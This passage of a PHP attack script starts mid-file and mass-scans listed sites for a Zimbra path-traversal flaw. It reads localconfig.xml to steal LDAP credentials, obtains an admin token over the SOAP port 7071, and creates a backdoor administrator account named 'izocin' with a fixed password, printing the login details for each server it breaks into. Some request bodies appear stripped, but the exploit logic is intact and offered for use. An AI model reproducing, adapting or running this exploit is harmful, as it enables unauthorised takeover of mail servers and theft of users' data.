$toket$req";
return $body;
}
if(!$argv[1]){
die("usage $argv[0] list.txt ");
}
$getlist=@file_get_contents($argv[1]);
$ex=explode("\r\n",$getlist);
echo "\n\t Total sites : ".count($ex)."\n";
foreach($ex as $izo){
$array = array();
$int = array('https://www.','http://',':','www.','https');
$replace = str_replace($int, "", $izo);
$maw = substr($replace,0);
$target = $maw;
$user_baru = "izocin";
$pwd_baru = "izocin";
$lfi = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
$link_lfi = "$target/$lfi";
echo "# scanning --->$target\n";
$ch2 = curl_init ("$link_lfi");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_ENCODING, "gzip");
curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
$ambil = curl_exec ($ch2);
$get_user = explode('', $ambil);
preg_match('/a\["(.*?)<\/value>/', $get_user[1], $user);
$get_pwd = explode('', $ambil);
preg_match('/a\["(.*?)<\/value>/', $get_pwd[1], $pwd);
if($user[1] or $pwd[1] != ""){
echo "# Deneniyor...\n";
$body = "
$user[1]$pwd[1]";
$link = "https://$target:7071/service/admin/soap";
$token = ngecek($link,$body);
preg_match('/(.*)<\/authToken>/', $token, $toket);
if($toket[1]==""){
echo "# token cekilemedi\n\n";
}
else{
echo "#token: $toket[1]\n";
$req = @("");
$body2 = nganu_body($toket[1],$req);
$liat = ngecek($link,$body2);
preg_match('/(.*?)<\/a>/', $liat, $domain);
echo "# Creating Account...\n";
$req2 = "$user_baru@$domain[1]$pwd_baru";
$body3 = nganu_body($toket[1],$req2);
$liat2 = ngecek($link,$body3);
preg_match('/account id="(.*)" name="/', $liat2, $new);
$req3 = "$new[1]TRUE";
$body4 = nganu_body($toket[1],$req3);
$liat3 = ngecek($link,$body4);
echo "# Success\n";
echo "# Login Panel: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@$domain[1]\n# Password: $pwd_baru\n\n";
}
}
else{
echo "# not Vulnerable\n\n";
}
}
?>